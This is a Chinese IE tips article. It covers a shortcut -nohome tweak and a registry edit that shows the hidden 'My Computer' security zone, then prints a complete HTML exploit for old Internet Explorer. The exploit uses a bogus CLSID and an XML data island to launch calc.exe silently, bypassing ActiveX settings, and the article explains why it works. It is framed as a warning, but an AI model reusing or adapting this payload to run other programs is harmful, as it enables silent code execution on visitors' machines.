继续我们的工作 ， 用鼠标右键单击该快捷方式 ， 选择“属性” ， 会弹出“Iexplore.exe 属性”对话框 ， 选择其中的“快捷方式”标签 ， 然后在“目标”框里填入："C：Program FilesInternet ExplorerIEXPLORE.EXE" -nohome ， 给Iexplore.exe加上参数“-nohome” ， 输入时请大家注意在参数“-nohome”前面有一个空格 ， 不要忘了 。点击“确定”退出即可 。
这样即使主页被修改也没有关系 ， 打开IE就是一片空白 ， 就连about：blank也不显示 。而且这样能够加快启动速度 ， 一点IE窗口马上就出蹦来了 。
对于IE在安装时自己建立的快捷方式 ， 我们无法为它加上上述参数 。如果不信可以试试 ， 用鼠标右键点击桌面上原来IE自建的快捷方式 ， 选“属性” ， 会发现“目标”栏、“起始位置”栏、“快捷键”栏和“运行方式”栏都是灰色不可选取状态 。这就是它们之间最大的不同！也是本文的关键所在 。

7.挖出IE本地安全配置选项
在IE中可以通过点击“工具→Internet选项→安全”来设定电脑安全等级 ， 之后会出现如图所示窗口（图3） 。从图中可以看出 ， 在安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点 。不过 ， 惯于隐藏其部分功能的微软（真不知微软是怎么想的 ， 老和我们玩“捉迷藏”游戏） ， 在这里又留了一手：其实这里还有一个隐藏的选项——就是“我的电脑”的安全性设定 ， 如果你想看到它 ， 可以通过修改注册表的方法来达到目的 。
下面是具体的方法：打开“开始”菜单中的“运行” ， 在弹出的“运行”对话框中输入Regedit.exe ， 打开注册表编辑器 ， 点击前面的“ ”号顺次展开到：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settingsones ， 在右边窗口中找到DWORD值“Flags” ， 默认键值为十六进制的21（十进制33） ， 双击“Flags” ， 在弹出的对话框中将它的键值改为“1”即可 ， 关闭注册表编辑器 。无需重新启动电脑 ， 重新打开IE ， 再次点击“工具→Internet选项→安全”标签 ， 你就会看到多了一个“我的电脑”图标 ， 在这里你可以对IE的本地安全进行配置 。
这个小技巧有什么用呢？把下面的代码保存为一个html文件 ， 然后运行试试就知道了：
注意：请把<；替换为向左的尖括号 ， 把>；替换为向右的尖括号 。
<；span datasrc="http://pic.yunnanlong.com/230522/00395515A-0.jpg" datafld="exploit" dataformatas="html">；<；/span>；
<；xml id="oExec">；
<；security>；
<；exploit>；
<；！[CDATA[
<；object id="oFile"
classid="clsid：88888888-8888-8888-8888-888888888888"
codebase="c：/winnt/system32/calc.exe">；<；/object>；
]]>；
<；/exploit>；
<；/security>；
<；/xml>；

运行上面的html文件 ， 会打开你的计算机中c：/winnt/system32文件夹下的calc.exe文件！而且IE没有任何提示！即使在IE的安全设置中禁用ActiveX控件上述代码也能工作！如果不是calc.exe文件而是其他恶意文件又会怎么样？如果是在你浏览的网页中含有类似上面的代码又会怎么样？真危险啊！
之所以会这样是由于IE存在两个可怕的漏洞：可本地执行任意命令 ， IE的ActiveX安全设置可被绕过 。在上述代码中我们给IE指定了一个系统中并不存在的控件号（"clsid：88888888-8888-8888-8888-888888888888） ， IE会试图从codebase指定的地址去下载并安装改控件 。根据codebase于是IE找到了c：/winnt/system32/calc.exe ， 接着IE开始“下载”并安装该程序 。由于calc.exe是EXE文件 ， 这样就等于是在运行该文件 ， 所以calc.exe就被运行了！
那么为什么IE在“下载安装控件”过程中不提示用户 ， 也不应用IE安全设置中的限定进行检测呢？这就是IE的ActiveX安全设置可被绕过漏洞造成的！其主要原因是IE安全设置都是针对非本地的页面或交互的 ， 对于本地的安全设置IE是最大信任的 。如果你注意看IE的安全设置 ， 都是对Internet和Intranet上WEB服务器而言的 ， 根本就没有对本地文件的安全设置 。概括说来就是IE对本地安全采用最大信任原则 。

推荐阅读

• 

  歌词找歌名真的忘记你是哪首歌
• 

  手机上显示hd是什么意思？
• 

  崩坏35.1开放世界奖励调整 崩坏3角色碎片刷新挑战介绍
• 

  我最喜欢的一种花【通用4篇】
• 

  手机微信看过的文件别人撤回了怎么办 有什么方法
• 

  幸福树长得太高了怎么处理
• 

  金钱树太长怎么修剪
• 

  手机号被注销了微信怎么登录
• 

  服用润喉糖有哪些需要注意的呢
• 

  合金钢是什么材质 耐磨合金钢有哪些牌号
• 

  吴昕杨丞琳，评委对杨丞琳和吴昕的态度截然不同
• 

  笼手切江怎么获得,《刀剑乱舞》笼手切江解析
• 

  李白的长歌行写作背景
• 

  仙侠道胧月怎么培养,刚搬出仙剑四手游
• 

  中暑应该吃啥食物 中暑能吃什么食物 吃什么对中暑好
• 

  房价下跌过快的坏处,房价下跌真的有那么可怕吗

• Windows11清理更新文件技巧分享
• 多普达699之不完全移动上网方案
• 怎么才能让我的浏览器运行的更快
• 解除cmwap方式上网时QQ的假死现象-适用所有gprs手机
• 康佳D261手机不能上网解决技巧
• 如何使拍照效果更好
• 抖音怎么更换名字
• epic更改下载游戏位置方法介绍
• 高压锅鸡肉怎么炖才会更好吃?
• 亚太版n73上网及彩信设置全攻略